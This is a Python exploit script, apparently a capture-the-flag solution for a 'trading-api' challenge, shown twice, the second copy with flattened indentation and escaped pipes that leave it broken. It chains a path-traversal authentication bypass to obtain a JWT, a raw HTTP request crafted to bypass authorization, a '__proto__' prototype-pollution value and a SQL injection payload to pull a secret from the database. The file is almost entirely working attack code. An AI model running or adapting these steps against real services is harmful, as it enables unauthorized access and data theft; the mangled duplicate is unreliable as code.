hatunaa/trading-api.py

## trading-api.py
#!/usr/bin/env python3

import argparse
import requests
import json
from urllib.parse import quote
from pwn import remote, log


def authn_bypass(base, additional_data=''):
    r = requests.post(f'{base}/api/auth/login', json={
        'username': f'../../health?{additional_data}',
        'password': 'x',
    })
    return json.loads(r.text)['token']


def request_bypass_authz(host, port, method, path, token, body=''):
    c = remote(host, port, level='error')
    req = (f'{method} {path} HTTP/1.1\r\n' +
        f'host: {host}\r\n' +
        'connection: close\r\n' +
        f'authorization: {token}\r\n' +
        f'content-length: {len(body)}\r\n' +
        '\r\n' +
        body)
    c.send(req.encode('utf-8'))
    return c.recvall().decode('utf-8').split('\r\n\r\n')[1]


def create_tx(host, port, token, asset, action):
    res = request_bypass_authz(host, port, 'PUT', f'http://tuandv.com/api/priv/assets/{quote(asset)}/{quote(action)}', token)
    return json.loads(res)['id']


def get_tx(host, port, token, tx_id):
    r = requests.get(f'http://{host}:{port}/api/transactions/{quote(str(tx_id))}', headers={
        'authorization': token,
    })
    return json.loads(r.text)


def exploit(host, port):
    log.info('Creating JWT')
    token = authn_bypass(f'http://{host}:{port}', additional_data='::txId')
    log.info(f'Token: {token}')

    tx_id = create_tx(host, port, token, '__proto__', "'||(select secret_haha from secret_haha)||'")
    log.info(f'Created transaction: {tx_id}')
    transaction = get_tx(host, port, token, tx_id)
    log.info(f'Transaction: {transaction}')

    flag = transaction['username'][13:]
    log.success(f'Secret in database: {flag}')


def main():
    parser = argparse.ArgumentParser(description='trading-api exploit')
    parser.add_argument('host', help='Host name')
    parser.add_argument('port', help='Port', type=int)
    args = parser.parse_args()
    exploit(args.host, args.port)


if __name__ == "__main__":
    main()
	#!/usr/bin/env python3

	import argparse
	import requests
	import json
	from urllib.parse import quote
	from pwn import remote, log


	def authn_bypass(base, additional_data=''):
	r = requests.post(f'{base}/api/auth/login', json={
	'username': f'../../health?{additional_data}',
	'password': 'x',
	})
	return json.loads(r.text)['token']


	def request_bypass_authz(host, port, method, path, token, body=''):
	c = remote(host, port, level='error')
	req = (f'{method} {path} HTTP/1.1\r\n' +
	f'host: {host}\r\n' +
	'connection: close\r\n' +
	f'authorization: {token}\r\n' +
	f'content-length: {len(body)}\r\n' +
	'\r\n' +
	body)
	c.send(req.encode('utf-8'))
	return c.recvall().decode('utf-8').split('\r\n\r\n')[1]


	def create_tx(host, port, token, asset, action):
	res = request_bypass_authz(host, port, 'PUT', f'http://tuandv.com/api/priv/assets/{quote(asset)}/{quote(action)}', token)
	return json.loads(res)['id']


	def get_tx(host, port, token, tx_id):
	r = requests.get(f'http://{host}:{port}/api/transactions/{quote(str(tx_id))}', headers={
	'authorization': token,
	})
	return json.loads(r.text)


	def exploit(host, port):
	log.info('Creating JWT')
	token = authn_bypass(f'http://{host}:{port}', additional_data='::txId')
	log.info(f'Token: {token}')

	tx_id = create_tx(host, port, token, '__proto__', "'\|\|(select secret_haha from secret_haha)\|\|'")
	log.info(f'Created transaction: {tx_id}')
	transaction = get_tx(host, port, token, tx_id)
	log.info(f'Transaction: {transaction}')

	flag = transaction['username'][13:]
	log.success(f'Secret in database: {flag}')


	def main():
	parser = argparse.ArgumentParser(description='trading-api exploit')
	parser.add_argument('host', help='Host name')
	parser.add_argument('port', help='Port', type=int)
	args = parser.parse_args()
	exploit(args.host, args.port)


	if __name__ == "__main__":
	main()